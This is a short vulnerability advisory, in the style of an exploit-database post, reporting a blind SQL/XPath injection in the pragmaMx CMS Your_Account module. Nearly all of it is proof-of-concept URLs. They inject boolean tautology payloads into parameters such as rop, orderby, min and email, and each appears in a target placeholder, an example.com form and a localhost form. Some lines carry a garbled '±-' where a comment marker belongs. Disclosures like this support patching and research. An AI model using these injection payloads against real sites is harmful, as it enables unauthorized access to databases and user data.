###########################################

CMS Name : pragmaMx ( All Version )

Bug Type : Blind SQL/XPath Injection vulnerability

Found by : Hadi Kiamarsi

Contact : hadikiamarsi [at] hotmail.com

Download :

http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download

###########################################

PoC :

http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0±-+&[email protected]
http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0±-+&cid=0&jumpswitch=Switch
http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&[email protected]&min=0'+and+31337-31337='0&orderby=dateD
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&[email protected]"+and+31337-31337="0

example :

http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&[email protected]
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&[email protected]&min=0'+and+31337-31337='0&orderby=dateD
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&[email protected]"+and+31337-31337="0

local Example :

http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&[email protected]
http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://localhost/html/modules.php?name=Your_Account&op=pass_lost&[email protected]&min=0'+and+31337-31337='0&orderby=dateD
http://localhost/html/modules.php?name=Your_Account&rop=showcontent&[email protected]"+and+31337-31337="0